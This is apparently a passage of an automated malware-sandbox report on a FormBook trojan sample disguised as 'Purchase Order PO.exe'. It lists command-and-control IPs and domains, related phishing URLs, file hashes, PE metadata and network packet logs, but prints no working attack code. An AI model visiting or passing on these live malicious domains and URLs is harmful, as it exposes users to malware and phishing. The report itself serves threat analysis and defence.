                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          31.186.11.114
                                                          		cyperla.xyzTurkey
                                                          		199484BETAINTERNATIONALTRtrue
                                                          103.224.182.242
                                                          		www.madhf.techAustralia
                                                          		133618TRELLIAN-AS-APTrellianPtyLimitedAUfalse
                                                          194.76.119.60
                                                          		cstrategy.onlineItaly
                                                          		202675KELIWEBITfalse
                                                          172.67.158.106
                                                          		www.bser101pp.buzzUnited States
                                                          		13335CLOUDFLARENETUSfalse
                                                          3.33.130.190
                                                          		goldstarfootwear.shopUnited States
                                                          		8987AMAZONEXPANSIONGBfalse

                                                          General Information

                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1563856
                                                          Start date and time:2024-11-27 15:31:06 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 9m 7s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:8
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:2
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:Purchase Order PO.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@7/2@7/5
                                                          EGA Information:
                                                          • Successful, ratio: 75%
                                                          HCA Information:
                                                          • Successful, ratio: 91%
                                                          • Number of executed functions: 97
                                                          • Number of non-executed functions: 282
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • VT rate limit hit for: Purchase Order PO.exe

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          09:31:56API Interceptor1x Sleep call for process: Purchase Order PO.exe modified
                                                          09:33:12API Interceptor1243058x Sleep call for process: isoburn.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          31.186.11.114Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                            103.224.182.242PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                            • www.madhf.tech/3iym/
                                                            Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                            • www.madhf.tech/6ou6/
                                                            Payroll List.exeGet hashmaliciousFormBookBrowse
                                                            • www.klohk.tech/3m3e/
                                                            Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                            • www.madhf.tech/0mwe/
                                                            DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                            • www.seeseye.website/37ym/?KV=8/t/mdNf2RQMOaNBNJ0C2CHQCZtSfGEsPKxsb92U4gy0IzojrjG5dpGxrabMefB+TiCWCE+I+OwKVMkti2s7d6J9YJjeD9jGibmgDAwgawFnRnPmUcSsGcI=&Wno=a0qDq
                                                            SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                            • www.madhf.tech/vpqb/
                                                            PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                                            • www.klohk.tech/3m3e/
                                                            Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                            • www.madhf.tech/p31e/
                                                            http://perpetualsnob.comGet hashmaliciousUnknownBrowse
                                                            • perpetualsnob.com/?fp=a3db7cd464228025d120ca597c81b5f2
                                                            Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                            • www.klohk.tech/3m3e/
                                                            194.76.119.60Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                            • www.cstrategy.online/qx5d/
                                                            3.33.130.190W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • www.ampsamkok88.shop/huvt/
                                                            FATURA.exeGet hashmaliciousFormBookBrowse
                                                            • www.platinumkitchens.info/x3qa/
                                                            creamymilkburnwtithsweetheartshegivenmebestterthingswhichnewandshineforme.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                            • www.artherapy.online/1vmx/
                                                            FACTURA 24V70 VINS.exeGet hashmaliciousFormBookBrowse
                                                            • www.funddata-x.net/ktuy/
                                                            ORIGINAL INVOICE COAU7230734290.exeGet hashmaliciousFormBookBrowse
                                                            • www.mcfunding.org/0598/
                                                            santi.exeGet hashmaliciousFormBookBrowse
                                                            • www.espiritismo.info/4knb/
                                                            TAX INVOICE.exeGet hashmaliciousFormBookBrowse
                                                            • www.platinumkitchens.info/x3qa/
                                                            Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                            • www.goldstarfootwear.shop/8m07/
                                                            Payroll List.exeGet hashmaliciousFormBookBrowse
                                                            • www.mcfunding.org/0598/
                                                            NEW PURCHASE ORDER DRAWINGSSPECS 5655-2024.vbeGet hashmaliciousFormBookBrowse
                                                            • www.qwibie.net/83g2/

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            www.madhf.techPayment_Confirmation_pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 103.224.182.242
                                                            PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                            • 103.224.182.242
                                                            Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                            • 103.224.182.242
                                                            Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                            • 103.224.182.242
                                                            SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                            • 103.224.182.242
                                                            Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                            • 103.224.182.242
                                                            www.bser101pp.buzzPurchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                            • 104.21.58.90
                                                            Quotation.exeGet hashmaliciousFormBookBrowse
                                                            • 104.21.58.90
                                                            payments.exeGet hashmaliciousFormBookBrowse
                                                            • 104.21.58.90

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            CLOUDFLARENETUShttp://secureverificationbooking.com/p/680450950Get hashmaliciousUnknownBrowse
                                                            • 172.67.151.211
                                                            https://application-submit.com/form/redbullGet hashmaliciousUnknownBrowse
                                                            • 1.1.1.1
                                                            https://application-submit.com/form/redbullGet hashmaliciousUnknownBrowse
                                                            • 104.26.9.44
                                                            http://secureverificationbooking.com/p/680450950Get hashmaliciousUnknownBrowse
                                                            • 172.67.151.211
                                                            cgoaudit Files.pdfGet hashmaliciousUnknownBrowse
                                                            • 104.17.25.14
                                                            Order 630195847002.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • 172.67.177.134
                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 104.21.82.174
                                                            file.exeGet hashmaliciousUnknownBrowse
                                                            • 104.21.82.174
                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                            • 172.67.160.80
                                                            https://file-data-point.vaultcloudaccess.cfd/pWCDWiGet hashmaliciousUnknownBrowse
                                                            • 104.16.123.96
                                                            TRELLIAN-AS-APTrellianPtyLimitedAUPayment_Confirmation_pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 103.224.182.242
                                                            kkEzK284oT.exeGet hashmaliciousHTMLPhisherBrowse
                                                            • 103.224.182.206
                                                            http://begantotireo.xyzGet hashmaliciousUnknownBrowse
                                                            • 103.224.212.217
                                                            http://begantotireo.xyzGet hashmaliciousUnknownBrowse
                                                            • 103.224.212.217
                                                            PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                            • 103.224.182.242
                                                            Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                            • 103.224.182.242
                                                            Payroll List.exeGet hashmaliciousFormBookBrowse
                                                            • 103.224.182.242
                                                            Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                            • 103.224.182.242
                                                            DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                            • 103.224.182.242
                                                            SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                            • 103.224.182.242
                                                            BETAINTERNATIONALTRPurchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                            • 31.186.11.114
                                                            z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeGet hashmaliciousFormBookBrowse
                                                            • 31.186.11.254
                                                            0nazQxrt5MZ5BRK.exeGet hashmaliciousFormBookBrowse
                                                            • 31.186.11.254
                                                            z1PEDIDODECOMPRAURGENTE.exeGet hashmaliciousFormBookBrowse
                                                            • 31.186.11.254
                                                            z2AMOSTRAS.exeGet hashmaliciousFormBookBrowse
                                                            • 31.186.11.254
                                                            #U0417#U0410#U041f#U0420#U041e#U0421.exeGet hashmaliciousFormBookBrowse
                                                            • 31.186.11.254
                                                            #U041e#U041f#U0418#U0421#U0410#U041d#U0418#U0415.exeGet hashmaliciousFormBookBrowse
                                                            • 31.186.11.254
                                                            #U0417#U0410#U041a#U0410#U0417 #U041d#U0410 #U041f#U041e#U041a#U0423#U041f#U041a#U0423.exeGet hashmaliciousFormBookBrowse
                                                            • 31.186.11.254
                                                            #U0633#U0641#U0627#U0631#U0634 #U062e#U0631#U06cc#U062f #U062c#U062f#U06cc#U062f.exeGet hashmaliciousFormBookBrowse
                                                            • 31.186.11.254
                                                            #U0646#U0645#U0648#U0646#U0647 #U0647#U0627.exeGet hashmaliciousFormBookBrowse
                                                            • 31.186.11.254
                                                            KELIWEBITPurchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                            • 194.76.119.60
                                                            rIMGTR657365756.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • 194.76.118.27
                                                            rSKGCROCOMANDAFABSRLM60_647746748846748347474.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • 194.76.118.27
                                                            rComandaKOMARONTRADESRL435635Lukketid.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • 194.76.118.27
                                                            https://shared.outlook.inky.com/link?domain=ctrk.klclick.com&t=h.eJw9jbFuwjAURX8FeYbYie0EMSE1FImhAwvqhOznR2v5EZD9MqH-O5ih87n3nIeYM4nNQvwy38tGSuCcmkRAEVIDt6skqdqDOX7sD6MelT5-rnfWnrqvfjd-n5VYLkSq_5_osyN2eeXnEicsZQXuHtmRzDfMjLT9n3h4m603QzD6Mliv8ILrvveofQCAQVkTlGyHTreqU8Y22tYS1tLVMW_RcchxSgEdlWqrOLzwNBP9PQFiYELz.MEYCIQD02rB_k_ktgQerK63B9HoYsBFlvy8F_tbykpnP7o7g5AIhAOA712rppvWoWatyTJ3OTcEdq2l5y_Vb1I5ameNhve0o%C3%B8#am9obi5kYXZpc0BhbWF6b24uY29tGet hashmaliciousHTMLPhisherBrowse
                                                            • 185.56.218.16
                                                            https://www.bonolacenter.com/Get hashmaliciousPhisherBrowse
                                                            • 185.221.173.68
                                                            Hilix.mpsl.elfGet hashmaliciousMiraiBrowse
                                                            • 185.221.174.5
                                                            Hilix.mips.elfGet hashmaliciousMiraiBrowse
                                                            • 185.221.174.2
                                                            64CU11Bnfr.elfGet hashmaliciousMiraiBrowse
                                                            • 185.221.174.2
                                                            https://chipotle.app.link/?$3p=e_et&$fallback_url=https%3A%2F%2Fwww.animagricola.farm%2Fssl%2Fanimagricola%2FTafeqld%2FbWl0Y2hlbGwuY2FyZXdAdGFmZXFsZC5lZHUuYXU=Get hashmaliciousHTMLPhisherBrowse
                                                            • 185.221.175.32

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Order PO.exe.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\Purchase Order PO.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1216
                                                            Entropy (8bit):5.34331486778365
                                                            Encrypted:false
                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                            Malicious:true
                                                            Reputation:high, very likely benign file
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                            C:\Users\user\AppData\Local\Temp\l420377x

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\isoburn.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):7.079516027703577
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            File name:Purchase Order PO.exe
                                                            File size:927'744 bytes
                                                            MD5:0cc96cc7ca98f253a1daeabf90a7692d
                                                            SHA1:909b1214d652f749d9bac08659ca51ae84bdb5e6
                                                            SHA256:868a520694e9477aeb67c350fb599752c94d5b541dcf14a334422b7b020e5d92
                                                            SHA512:a1b4c57814e64a144aee528e918a89d32289c424b04ffeecd97302767546d463edec4b92ca55da61b90399740378aeb8fac13fc1d6f0fbddfc1b42c0e1c9d447
                                                            SSDEEP:12288:pfTVb6Hf2ilkiU5rp3WT3jteALsYMpHqoiBQpHMfJhsLlZq134Bighe6/:pfTsrmiortejAALVMp5iBQpbg1y
                                                            TLSH:DA15D53E19B9622BB1B5C766EBE48527F0709AEFF151AD24D4EB435A4302A0374C327D
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{7................0.............f:... ...@....@.. ....................................@................................

                                                            File Icon

                                                            Icon Hash:00928e8e8686b000

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x4e3a66
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x99AA377B [Mon Sep 11 18:22:51 2051 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            push ebx
                                                            add byte ptr [ecx+00h], bh
                                                            jnc 00007FF8D080EED2h
                                                            je 00007FF8D080EED2h
                                                            add byte ptr [ebp+00h], ch
                                                            add byte ptr [ecx+00h], al
                                                            arpl word ptr [eax], ax
                                                            je 00007FF8D080EED2h
                                                            imul eax, dword ptr [eax], 00610076h
                                                            je 00007FF8D080EED2h
                                                            outsd
                                                            add byte ptr [edx+00h], dh
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xe3a130x4f.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xe40000x644.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xe60000xc.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0xe26ac0x70.text
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000xe1a8c0xe1c00e694b042ff9dc43f90f4cc9a21c38856False0.7287697691722038data7.0876526398275495IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rsrc0xe40000x6440x800cd4233b0cb3ca2b8174d97adaacb855cFalse0.34130859375data3.4992417277626706IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0xe60000xc0x2000f0d00919177902c640ab5afc05357f3False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_VERSION0xe40900x3b4data0.41244725738396626
                                                            RT_MANIFEST0xe44540x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                            Imports

                                                            DLLImport
                                                            mscoree.dll_CorExeMain

                                                            Network Behavior

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 27, 2024 15:32:50.165148020 CET4978680192.168.2.531.186.11.114
                                                            Nov 27, 2024 15:32:50.288779020 CET804978631.186.11.114192.168.2.5
                                                            Nov 27, 2024 15:32:50.288886070 CET4978680192.168.2.531.186.11.114
                                                            Nov 27, 2024 15:32:50.299137115 CET4978680192.168.2.531.186.11.114
                                                            Nov 27, 2024 15:32:50.424684048 CET804978631.186.11.114192.168.2.5
                                                            Nov 27, 2024 15:32:51.672260046 CET804978631.186.11.114192.168.2.5
                                                            Nov 27, 2024 15:32:51.672617912 CET804978631.186.11.114192.168.2.5
                                                            Nov 27, 2024 15:32:51.672727108 CET4978680192.168.2.531.186.11.114
                                                            Nov 27, 2024 15:32:51.672981977 CET804978631.186.11.114192.168.2.5
                                                            Nov 27, 2024 15:32:51.673027039 CET4978680192.168.2.531.186.11.114
                                                            Nov 27, 2024 15:32:51.676213980 CET4978680192.168.2.531.186.11.114
                                                            Nov 27, 2024 15:32:51.796185970 CET804978631.186.11.114192.168.2.5
                                                            Nov 27, 2024 15:33:07.966552973 CET4982380192.168.2.5194.76.119.60
                                                            Nov 27, 2024 15:33:08.086617947 CET8049823194.76.119.60192.168.2.5
                                                            Nov 27, 2024 15:33:08.086709023 CET4982380192.168.2.5194.76.119.60
                                                            Nov 27, 2024 15:33:08.243638992 CET4982380192.168.2.5194.76.119.60
                                                            Nov 27, 2024 15:33:08.367347956 CET8049823194.76.119.60192.168.2.5
                                                            Nov 27, 2024 15:33:09.460431099 CET8049823194.76.119.60192.168.2.5
                                                            Nov 27, 2024 15:33:09.461144924 CET8049823194.76.119.60192.168.2.5
                                                            Nov 27, 2024 15:33:09.461213112 CET4982380192.168.2.5194.76.119.60
                                                            Nov 27, 2024 15:33:09.747344971 CET4982380192.168.2.5194.76.119.60
                                                            Nov 27, 2024 15:33:11.074223995 CET4983180192.168.2.5194.76.119.60
                                                            Nov 27, 2024 15:33:11.194144964 CET8049831194.76.119.60192.168.2.5
                                                            Nov 27, 2024 15:33:11.194263935 CET4983180192.168.2.5194.76.119.60
                                                            Nov 27, 2024 15:33:11.208590984 CET4983180192.168.2.5194.76.119.60
                                                            Nov 27, 2024 15:33:11.329086065 CET8049831194.76.119.60192.168.2.5
                                                            Nov 27, 2024 15:33:12.586431980 CET8049831194.76.119.60192.168.2.5
                                                            Nov 27, 2024 15:33:12.586535931 CET8049831194.76.119.60192.168.2.5
                                                            Nov 27, 2024 15:33:12.586643934 CET4983180192.168.2.5194.76.119.60
                                                            Nov 27, 2024 15:33:12.716156006 CET4983180192.168.2.5194.76.119.60
                                                            Nov 27, 2024 15:33:13.735450029 CET4983780192.168.2.5194.76.119.60
                                                            Nov 27, 2024 15:33:13.855490923 CET8049837194.76.119.60192.168.2.5
                                                            Nov 27, 2024 15:33:13.855635881 CET4983780192.168.2.5194.76.119.60
                                                            Nov 27, 2024 15:33:13.870307922 CET4983780192.168.2.5194.76.119.60
                                                            Nov 27, 2024 15:33:13.990711927 CET8049837194.76.119.60192.168.2.5
                                                            Nov 27, 2024 15:33:13.990761995 CET8049837194.76.119.60192.168.2.5
                                                            Nov 27, 2024 15:33:15.241231918 CET8049837194.76.119.60192.168.2.5
                                                            Nov 27, 2024 15:33:15.241452932 CET8049837194.76.119.60192.168.2.5
                                                            Nov 27, 2024 15:33:15.241525888 CET4983780192.168.2.5194.76.119.60
                                                            Nov 27, 2024 15:33:15.372525930 CET4983780192.168.2.5194.76.119.60
                                                            Nov 27, 2024 15:33:16.391251087 CET4984380192.168.2.5194.76.119.60
                                                            Nov 27, 2024 15:33:16.511354923 CET8049843194.76.119.60192.168.2.5
                                                            Nov 27, 2024 15:33:16.511451960 CET4984380192.168.2.5194.76.119.60
                                                            Nov 27, 2024 15:33:16.520003080 CET4984380192.168.2.5194.76.119.60
                                                            Nov 27, 2024 15:33:16.640414953 CET8049843194.76.119.60192.168.2.5
                                                            Nov 27, 2024 15:33:17.889467955 CET8049843194.76.119.60192.168.2.5
                                                            Nov 27, 2024 15:33:17.889645100 CET8049843194.76.119.60192.168.2.5
                                                            Nov 27, 2024 15:33:17.889703989 CET4984380192.168.2.5194.76.119.60
                                                            Nov 27, 2024 15:33:17.892299891 CET4984380192.168.2.5194.76.119.60
                                                            Nov 27, 2024 15:33:18.012368917 CET8049843194.76.119.60192.168.2.5
                                                            Nov 27, 2024 15:33:24.083178997 CET4986180192.168.2.5103.224.182.242
                                                            Nov 27, 2024 15:33:24.209182024 CET8049861103.224.182.242192.168.2.5
                                                            Nov 27, 2024 15:33:24.209280968 CET4986180192.168.2.5103.224.182.242
                                                            Nov 27, 2024 15:33:24.225250006 CET4986180192.168.2.5103.224.182.242
                                                            Nov 27, 2024 15:33:24.345381975 CET8049861103.224.182.242192.168.2.5
                                                            Nov 27, 2024 15:33:25.453655005 CET8049861103.224.182.242192.168.2.5
                                                            Nov 27, 2024 15:33:25.453874111 CET8049861103.224.182.242192.168.2.5
                                                            Nov 27, 2024 15:33:25.453952074 CET4986180192.168.2.5103.224.182.242
                                                            Nov 27, 2024 15:33:25.731801033 CET4986180192.168.2.5103.224.182.242
                                                            Nov 27, 2024 15:33:26.755865097 CET4986980192.168.2.5103.224.182.242
                                                            Nov 27, 2024 15:33:26.877228975 CET8049869103.224.182.242192.168.2.5
                                                            Nov 27, 2024 15:33:26.877341986 CET4986980192.168.2.5103.224.182.242
                                                            Nov 27, 2024 15:33:26.891403913 CET4986980192.168.2.5103.224.182.242
                                                            Nov 27, 2024 15:33:27.011801958 CET8049869103.224.182.242192.168.2.5
                                                            Nov 27, 2024 15:33:28.224009991 CET8049869103.224.182.242192.168.2.5
                                                            Nov 27, 2024 15:33:28.224415064 CET8049869103.224.182.242192.168.2.5
                                                            Nov 27, 2024 15:33:28.224479914 CET4986980192.168.2.5103.224.182.242
                                                            Nov 27, 2024 15:33:28.451621056 CET4986980192.168.2.5103.224.182.242
                                                            Nov 27, 2024 15:33:29.472858906 CET4987680192.168.2.5103.224.182.242
                                                            Nov 27, 2024 15:33:29.593466043 CET8049876103.224.182.242192.168.2.5
